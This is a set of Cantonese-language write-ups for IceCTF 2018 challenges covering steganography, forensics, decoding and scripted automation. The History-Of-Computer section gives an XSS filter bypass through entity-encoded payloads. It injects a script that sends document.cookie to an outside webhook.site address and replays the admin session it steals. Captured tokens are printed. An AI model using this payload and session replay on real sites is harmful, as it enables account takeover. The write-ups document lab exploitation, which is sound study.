IceCTF2018-Drumbone

Question

Solution

Stegosolve

最後放番大D點

1
2
3
4
5
6
7
8
9
10
11
12
from PIL import Image, ImageFont, ImageDraw

flagImage = Image.new('RGB', (1000,1000), "white")
im = Image.open('solved.bmp')
im = im.convert('RGB')

for x in range(350):
for y in range(229):
if im.getpixel((x,y)) == (0,0,0):
dr = ImageDraw.Draw(flagImage)
dr.rectangle(((x,y),(x+5,y+5)), fill="black", outline = "black")
flagImage.save("flag2.png")

IceCTF2018-Lost-in-the-forest

Question

fz.zip

Solution

發現左個奇怪既file /home/hkr/.bash_history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
git
exit
cd root
pwd
ls
ls -la
exit
cat /etc/hostname
exit
cat /etc/hostname
exit
cat /eyc/hostname
cat /etc/hostname
echo Centos >> /etc/hostname
bash
echo Centos > /etc/hostname
bash
exit
cd ~/.i3
cd ~
ls
pwd
cd ..
ls
cd .i3
pwd
ls -a
cd ~/.i3
cd
ls
ls -a
pwd
cd ..
ls
ls -a
cd ..
ls
ls -a
cd etc
ls
ls -a
cd i3
ls
cd
ls
ls -a
mkdir .i3
ls
ls -a
ls
ls -a
cd Documents/
ls
mv config ~/.i3
ls
cd ..
ls
ls -a
cd .i3
ls
cd
cd documents
cd Documents/
ls
cd
ls
cd .i3
ls
sudo subl config
cd
ls
cd Pictures/
ls
pwd
cd ..
ls
ls 0a
ls -a
cd bin
ls
cd
ls
cd
ls
ls -a
cd .bashrc
sudo subl .bashrc
sudo subl .bash_aliases
ls
brightness
ls
sudo echo 200 > brightness
sudo su
cd
cd Downloads
wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
cd
ls
sudo subl .bash_aliases
backlight
brightrness
brightness
ls
cd
command-list
alias-list
alias-list
alias-list
sudo subl .bashrc
sudo subl .bash_aliases
i3-config
alias-list
brightness
i3-config
alias-list
sudo subl .bashrc
alias-list
sudo subl .bashrc
alias-list
bash_aliases
. ~/.bash_aliases
sudo subl .bash_welcome
sudo subl .bash_todo
alias-list
todo
to-do
edit-todo
to-do
cd
alias-list
edit-todo
cd Downloads
ls -a
mv eRkjLlksZp tool.py
cat .bash_aliases
sudo subl .bash_aliases
alias-list
cat .bash_aliases
ls -a
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386
javac -version
sudo apt update
apt list --upgradable
javac -version
sudo apt install oracle-java8-installer
javac -version
sudo apt install oracle-java8-set-default
ls
cd bin
ls
./studio.sh
ls
cd android
cd Android/
ls
cd ..
ls
cd ..
cd
./studio.sh
cd ..
ls
cd ..
ls
cd /mnt
ls
cd
cd Downloads
./tool.py ../secret > ../hzpxbsklqvboyou
ls -a
cd ..
ls
cd usr/
ls
cd bin
ls
ls ..
ls
cd ..
ls
cd locals
cd local
ls
cd android-studio/
ls
cd
shred secret
ls
ls -a
sudo subl .bash_aliases
android-studio
ls
ls Documents/
ls
cd Documents/
ls
cd ..
cd Downloads/
rm tool.py
ls
ls
cd
ls
git
sudo apt install git
git config --global user.name "skuli"
git config --global user.email "sheep.man@fake.com"
ls -a
cat .gitconfig
cd Documents/
ls
mkdir projects
ls
cd projects
pwd
cd ..
cd Downloads/
cd java/
ls
cd jre1.8.0_171/
ls
cd bin/
ls
cd ..
cd jre1.8.0_171/
ls
cat README
cd ..
ls
cd ..
ls
cd local/
ls
cd bin/
ls
ls
cd 3840x2160/
ls
cd ..
cd .
cd ..
ls -al
cd .local/
ls
cd share/
ls
ls
cd Write/
ls
sudo chmod +x INSTALL
ls
sudo ./INSTALL
sudo chmod -x INSTALL
cat INSTALL
ls
./Write
ls
cd ..
ls
sudo rm write209.tar.gz
sudo rm -R Write/
ls
cd ..
ls
ls
ls -al
grep / "howdy" 2> /dev/null
cd ..
grep -r "howdy" 2> /dev/null
ls /lib/security/
cd /lib/security/
ls
ls -al
tree
cd howdy/
ls
./cli
./cli.py
ls
exit

有個奇怪既 tools link

1
https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/python3
import sys
import base64

def encode(filename):
with open(filename, "r") as f:
s = f.readline().strip()
return base64.b64encode((''.join([chr(ord(s[x])+([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x]) for x in range(len(s))])).encode('utf-8')).decode('utf-8')[::-1]*5

if __name__ == "__main__":
print(encode(sys.argv[1]))

同場加映一個奇怪既file /home/hkr/hzpxbsklqvboyou

1
8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT

似是而非既 base64..

好似係用條script encode出黎架喎 , 咁調番轉黎寫囉…

1
2
3
4
5
6
7
8
def decode():
enc = base64.b64decode("8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT"[::-1])
mDict = ([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)
plain = ""
for x in range(len(enc)):
plain += chr(ord(enc[x]) - mDict[x])
print plain
decode()

IceCTF2018-HardShells

Question

hardshells

Solution

睇左睇個魔法頭 , 好似係 zip file. 不過有密碼
是但扔入去個 ARCHPR 到等左幾秒就爆左個密碼出黎

1
tacos

之後入面有個file 叫d
d

睇個魔法頭好似係爛左個png黎
張圖係由0xec00開始

1
2
3
4
0xec03 改做 0x4e
0x10800 - 0x10bf0 刪左佢
頭尾D空白刪晒佢
改番d crc 就完事

IceCTF2018-Anticaptcha

Solution

比左個網 , 入面有百尻幾條問題 , 自動解啦咁

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import requests
from bs4 import BeautifulSoup
from math import sqrt; from itertools import count, islice
import gmpy2

def solveQuestion(s):
if "word in the following line" in s:
s = s.replace("\n"," ").replace("."," ").replace(" "," ")
num = int(s.split(" ")[3].replace("th","").replace("st","").replace("nd","").replace("rd",""))
return s.split(": ")[1].split(" ")[num-1]
elif "a prime number" in s:
num = int(s.split(" ")[1])
return str(gmpy2.is_prime(num)).lower()
elif "What is the greatest common divisor" in s:
num1 = int(s.split(" ")[7])
num2 = int(s.split(" ")[9].replace("?", ""))
return gmpy2.gcd(num1, num2)
elif "Which planet is closest to the sun" in s:
return "Mercury"
elif "What is the capital of Germany" in s:
return "Berlin"
elif "How many planets are between Earth and the Sun?" in s:
return "2"
elif "How many strings does a violin have?" in s:
return "4"
elif "What is the tallest mountain on Earth?" in s:
return "Mount Everest"
elif "What year is it?" in s:
return "2018"
elif "What color is the sky?" in s:
return "Blue"
elif "Who directed the movie Jaws?" in s:
return "Steven Spielberg"
elif "What is the capital of Hawaii?" in s:
return "Honolulu"
else:
print s

s = requests.Session()
content = s.get("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/").text
soup = BeautifulSoup(content, 'html.parser')

td_tags = soup.find_all("td")
answer = []

for i in range(0, len(td_tags), 2):
answer.append(str(solveQuestion(td_tags[i].string)))

print s.post("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/", data={'answer':answer}).text[:2000]

IceCTF2018-Pokeamango

Question

pokeamango.apk

Solution

開左個app黎睇 , 係極簡化版既 pokemonGO , d mango會係地圖到show出黎 , 禁落去就會開相機 , 禁隻mango就會捉左
但係要捉150隻手動真係不了

Decompile完之後見到 asserts/www/ , 隻app似乎 d logic係晒 web到
見到map.js有段係

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
var updateMap = function() {
console.log("updating map");
map.setCenter(currentPos);

// Clear mangos
for (var i = 0; i < mangos.length; i++) {
mangos[i].setMap(null);
}
mangos = [];

var user = new google.maps.Marker({
position: currentPos,
map: map,
icon: 'img/user_marker.png'
});

// You're my favorite mango
mangos.push(user);

var payload = {
lat: currentPos.lat,
long: currentPos.lng
}

payload["uuid"] = uuid

$.post("http://pokeamango.vuln.icec.tf/mango/list", payload, function(results){
var data = results["mangos"];
for (var i = 0; i < data.length; i++) {
var place = data[i];

var mango = new google.maps.Marker({
position: place,
map: map,
icon: 'img/mangie_marker.png'
});

mangos.push(mango);

mango.addListener('click', function(event){
window.name = (currentPos.lat()) + "," + (currentPos.lng()) + "," + (this.getPosition().lat()) + "," + (this.getPosition().lng());
window.location.href = "camera.html";
});
}
});
};

似乎

1
http://pokeamango.vuln.icec.tf/mango/list

係用黎list d mongo出黎

睇埋 map.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function catchMango() {
var payload = {
"curLat": currentPosLat,
"curLong": currentPosLng,
"mangoLat": mangoPosLat,
"mangoLong": mangoPosLng,
"uuid": device.uuid
};

$.post("http://pokeamango.vuln.icec.tf/mango/catch", payload, function(results){

window.plugins.toast.showLongBottom(results["message"], function(a){console.log('toast success: ' + a)}, function(b){alert('toast error: ' + b)})
$("#mango").removeClass("bounce infinite");
$("#mango").addClass("bounceOutRight");
setTimeout(function(){ window.location.href = "map.html"; }, 1000);
});
};

咁有齊料自動捉mango啦

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
import json

uuid = "46fc1c22626b960c"
currentLat = "22.3208988"
currentLng = "114.1891175"
while True:
c = requests.post("http://pokeamango.vuln.icec.tf/mango/list", data={'lat':currentLat, 'long':currentLng, 'uuid':uuid}).text
print c
j = json.loads(c)
if j['mangos'] != []:
for m in j['mangos']:
lat = m['lat']
lng = m['lng']
print requests.post("http://pokeamango.vuln.icec.tf/mango/catch", data={'uuid':uuid, 'curLat':currentLat, 'curLong':currentLng, 'mangoLat':lat, 'mangoLong':lng}).text
print "Count: " + requests.post("http://pokeamango.vuln.icec.tf/mango/count", data={'uuid':uuid}).text
"""
{
"mangos": [{
"lat": 22.319894,
"lng": 114.232087
}],
"token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1dWlkIjoiNDZmYzFjMjI2MjZiOTYwYyJ9._qZPGKdWiHoRa5Jq0OgLwZC-9-nwZD8VYONsCtuM_b8"
}
"""

當捉到無野捉之後 , 轉一個個currentLat , currentLng就可以繼續行

IceCTF2018-Ancient-Foreign-Communication

Question

1
E2 A8 85 5D 5D E2 8C 9E E2 8C 9E E2 8C 9F 5B E2 A8 86 5D E2 8C 9F 5D 5D 5D E2 A8 86 E2 A8 86 E2 A8 86 E2 8C 9C 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 A8 85 E2 A8 85 E2 8C 9E E2 8C 9E E2 A8 86 5B 5D 5D 5D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D E2 8C 9F 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D 5D E2 8C 9E E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 5D E2 8C 9E E2 8C 9E

Solution

直接 UTF-8 decode 得出

1
⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]]⌟[[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞

睇住個phone numpad 唔知點解諗到

1
2
3
⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]] ⌟ [[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞
THE mag icwordsares queamish os sifrage
The magic words are squeamish ossifrage

IceCTF2018-ilovebees

Question

https://static.icec.tf/iloveflowers/

Solution

上網搵左搵 , 原來係抄 halo2 宣傳橋段入面果個網既
http://www.ilovebees.co/

對比完2個網既source code之後發現 , 原版係冇favicon.
問題一定係出係favicon身上!

首先extract晒d frame出黎先啦 , 之後再用script拎番每幅圖既每一粒pixel既r,g,b合埋就搞掂

1
2
3
4
5
6
7
8
9
10
11
12
13
from PIL import Image, ImageFont, ImageDraw

c = ""
for i in range(110):
im = Image.open('frame_' + str(i).zfill(3) + '_delay-0.1s.gif')
im = im.convert('RGB')
for x in range(16):
for y in range(16):
r,g,b = im.getpixel((y,x))
c += '{:02x}{:02x}{:02x}'.format(r, g, b)
with open("ilovebees", "wb") as f:
f.write(c.decode('hex'))
f.close()

IceCTF2018-HotOrNot

Question

Solution

咁個標題都講左係要認熱狗同狗 , 咁我思路就係認晒圖入面咁多張 , 當最後個output係就白色 唔係就黑色咁先啦

首先切做均等大細先

1
2
3
4
5
6
7
8
9
10
11
12
from PIL import Image, ImageFont, ImageDraw

Image.MAX_IMAGE_PIXELS = 379782144

im = Image.open('hotornot.jpg')

index = 1
for i in range(0,87):
for j in range(0,87):
chim = im.crop((224*i, 224*j, 224*i+224, 224*j+224))
chim.save(str(index) + ".jpg")
index += 1

最後出左7569張圖

咁之後就要做認圖果part啦 , 因為我懶 , 咁是但上網搵個library用算啦
最後就搵到呢個 https://github.com/jramasani/hotdog-nothotdog

最後都係跟番佢

1
docker run -it   --publish 6006:6006   --volume ${HOME}/tf_files:/tf_files   --workdir /tf_files   tensorflow/tensorflow:latest-devel

然後改左改佢條script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import os, sys

import tensorflow as tf

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
files = os.listdir("./hotornot")
files = [file for file in os.listdir('./hotornot') if file.endswith('.jpg')]
files.sort(key= lambda x:int(x[:-4]))

index = 1
# change this as you see fit
image_path = sys.argv[1]

# Read in the image_data
image_data = tf.gfile.FastGFile(image_path, 'rb').read()

# Loads label file, strips off carriage return
label_lines = [line.rstrip() for line
in tf.gfile.GFile("/tf_files/retrained_labels.txt")]

# Unpersists graph from file
with tf.gfile.FastGFile("/tf_files/retrained_graph.pb", 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')

with tf.Session() as sess:
# Feed the image_data as input to the graph and get first prediction
softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')

predictions = sess.run(softmax_tensor, \
{'DecodeJpeg/contents:0': image_data})

# Sort to show labels of first prediction in order of confidence
top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]

hotScore = 0
notHotScore = 0
for node_id in top_k:
human_string = label_lines[node_id]
score = predictions[0][node_id]
#print('%s (score = %.5f)' % (human_string, score))
if human_string == "hotdog":
hotScore = score
else:
notHotScore = score
if hotScore > notHotScore:
print "1"
else:
print "0"

自己用黎call 上面果條script既script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import os
from subprocess import call

files = os.listdir("./hotornot")
files = [file for file in os.listdir('./hotornot') if file.endswith('.jpg')]
files.sort(key= lambda x:int(x[:-4]))
print files
result = ""
index = 1
for f in files:
result += os.popen("python label_hotnot.py ./hotornot/" + f).read().replace("\n","")
print "Status: " + str(index) + " / " + str(len(files))
index += 1
with open("result.txt", "wb") as f:
f.write(result)
f.close()

最後似係qrcode , 然後執左執

IceCTF2018-History-Of-Computer

Solution

首先一入到去見到有得註冊喎 , 咁註冊完登入睇下咩料子先啦
發現有得留 comment , 留個試下先, 留完仲有得report添喎 , 仲唔係玩xss?

發現有2個奇怪既 cookies , 分別係 session 同埋 token

咁似 base64 既 , decode黎睇下先

1
2
3
4
5
6
7
8
9
10
import base64
#session
base64.b64decode('eyJ1c2VyIjoyfQ.Dno_HQ.0n1XWQBTVFhQ9NxFkuqWKik5uJU==')
#{"user":2}\x00\xe7\xa0t4\x9fU\xd6@\x14\xd5\x16\x14=7\x11d\xba\xa5\x8a\x8aNn%

#token
base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=')
#{"typ":"JWT","alg":"none"}
base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==')
#{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}

咁發現有個 username 喎 , 同埋 user係2. 有2咁應該有1啦 , 我諗終極目標係拎到user:1 既登入資料掛?
咁試下改個username啦

1
2
3
import base64
base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有

竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇

竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦

1
2
3
improt base64
base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=

但是原來有做 filtering

試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既

1
2
3
import base64
base64.b64encode('{"username":"<img src=x onerror=\'&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

呢抽野

1
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41

其實係

1
javascript:alert('XSS')

大家可以用呢個網試下轉
http://evuln.com/tools/xss-encoder/

然後就可以構造個http request比admin access啦

1
function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();

1
2
3
import base64
base64.b64encode('{"username":"<img src=x onerror=\'&#102&#117&#110&#99&#116&#105&#111&#110&#32&#104&#116&#116&#112&#71&#101&#116&#40&#41&#123&#118&#97&#114&#32&#120&#109&#108&#72&#116&#116&#112&#32&#61&#32&#110&#101&#119&#32&#88&#77&#76&#72&#116&#116&#112&#82&#101&#113&#117&#101&#115&#116&#40&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#111&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#115&#58&#47&#47&#119&#101&#98&#104&#111&#111&#107&#46&#115&#105&#116&#101&#47&#57&#50&#56&#101&#52&#53&#48&#49&#45&#52&#98&#55&#51&#45&#52&#52&#57&#49&#45&#97&#51&#100&#101&#45&#49&#48&#101&#48&#99&#97&#100&#55&#56&#57&#99&#98&#63&#97&#61&#34&#32&#43&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#44&#32&#102&#97&#108&#115&#101&#32&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#115&#101&#110&#100&#40&#32&#110&#117&#108&#108&#32&#41&#59&#125&#104&#116&#116&#112&#71&#101&#116&#40&#41&#59\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDImIzExNyYjMTEwJiM5OSYjMTE2JiMxMDUmIzExMSYjMTEwJiMzMiYjMTA0JiMxMTYmIzExNiYjMTEyJiM3MSYjMTAxJiMxMTYmIzQwJiM0MSYjMTIzJiMxMTgmIzk3JiMxMTQmIzMyJiMxMjAmIzEwOSYjMTA4JiM3MiYjMTE2JiMxMTYmIzExMiYjMzImIzYxJiMzMiYjMTEwJiMxMDEmIzExOSYjMzImIzg4JiM3NyYjNzYmIzcyJiMxMTYmIzExNiYjMTEyJiM4MiYjMTAxJiMxMTMmIzExNyYjMTAxJiMxMTUmIzExNiYjNDAmIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTEmIzExMiYjMTAxJiMxMTAmIzQwJiMzNCYjNzEmIzY5JiM4NCYjMzQmIzQ0JiMzMiYjMzQmIzEwNCYjMTE2JiMxMTYmIzExMiYjMTE1JiM1OCYjNDcmIzQ3JiMxMTkmIzEwMSYjOTgmIzEwNCYjMTExJiMxMTEmIzEwNyYjNDYmIzExNSYjMTA1JiMxMTYmIzEwMSYjNDcmIzU3JiM1MCYjNTYmIzEwMSYjNTImIzUzJiM0OCYjNDkmIzQ1JiM1MiYjOTgmIzU1JiM1MSYjNDUmIzUyJiM1MiYjNTcmIzQ5JiM0NSYjOTcmIzUxJiMxMDAmIzEwMSYjNDUmIzQ5JiM0OCYjMTAxJiM0OCYjOTkmIzk3JiMxMDAmIzU1JiM1NiYjNTcmIzk5JiM5OCYjNjMmIzk3JiM2MSYjMzQmIzMyJiM0MyYjMzImIzEwMCYjMTExJiM5OSYjMTE3JiMxMDkmIzEwMSYjMTEwJiMxMTYmIzQ2JiM5OSYjMTExJiMxMTEmIzEwNyYjMTA1JiMxMDEmIzQ0JiMzMiYjMTAyJiM5NyYjMTA4JiMxMTUmIzEwMSYjMzImIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTUmIzEwMSYjMTEwJiMxMDAmIzQwJiMzMiYjMTEwJiMxMTcmIzEwOCYjMTA4JiMzMiYjNDEmIzU5JiMxMjUmIzEwNCYjMTE2JiMxMTYmIzExMiYjNzEmIzEwMSYjMTE2JiM0MCYjNDEmIzU5Jz4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=

然後禁 report , 再等幾秒

1
https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.; session=eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU

最後 get flag!

1
2
3
import requests
cookie = {'token':'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.', 'session':'eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU'}
requests.get("https://43xa7xhkaj0cd8c-history.labs.icec.tf/", cookies=cookie).text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
<!DOCTYPE html>
<html>
<head>
<!--Import Google Icon Font-->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<!--Import materialize.css-->

<link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/main.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/style.css" media="screen,projection"/>

<!--Let browser know website is optimized for mobile-->
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body>

<nav>
<div class="nav-wrapper white">
<div class="container">
<a href="/" class="brand-logo">History of Computing</a>
<ul id="nav-mobile" class="right hide-on-med-and-down">

<li>admin</li>

<li><a href="/logout">Logout</a></li>

</ul>
</div>
</div>
</nav>



<div class="ribbon pink"></div>
<div class="container">

<div class="flag center blue white-text">
IceCTF{who_trusts_these_cookies_anyway?}
</div>

<div class="row post">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/icectfteam.jpg">
<span class="card-title">The First Compiler</span>
</div>

<a class="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger" href="#comment-modal" data-id="1"><i class="material-icons">comment</i></a>


<div class="card-content">
<h5>IceCTF Worked on The First Compiler</h5>
<p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p>
<p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>

<div class="ribbon cyan"></div>
<div class="container">
<div class="row">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/eniac.jpg">
<span class="card-title">The ENIAC!</span>
</div>

<a class="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger" href="#comment-modal" data-id="2"><i class="material-icons">comment</i></a>

<div class="card-content">
<h5>The IceCTF Team Created The ENIAC!</h5>
<p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p>
<p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>


<footer class="page-footer grey darken-3">
<div class="container">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Me</h5>
<p class="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
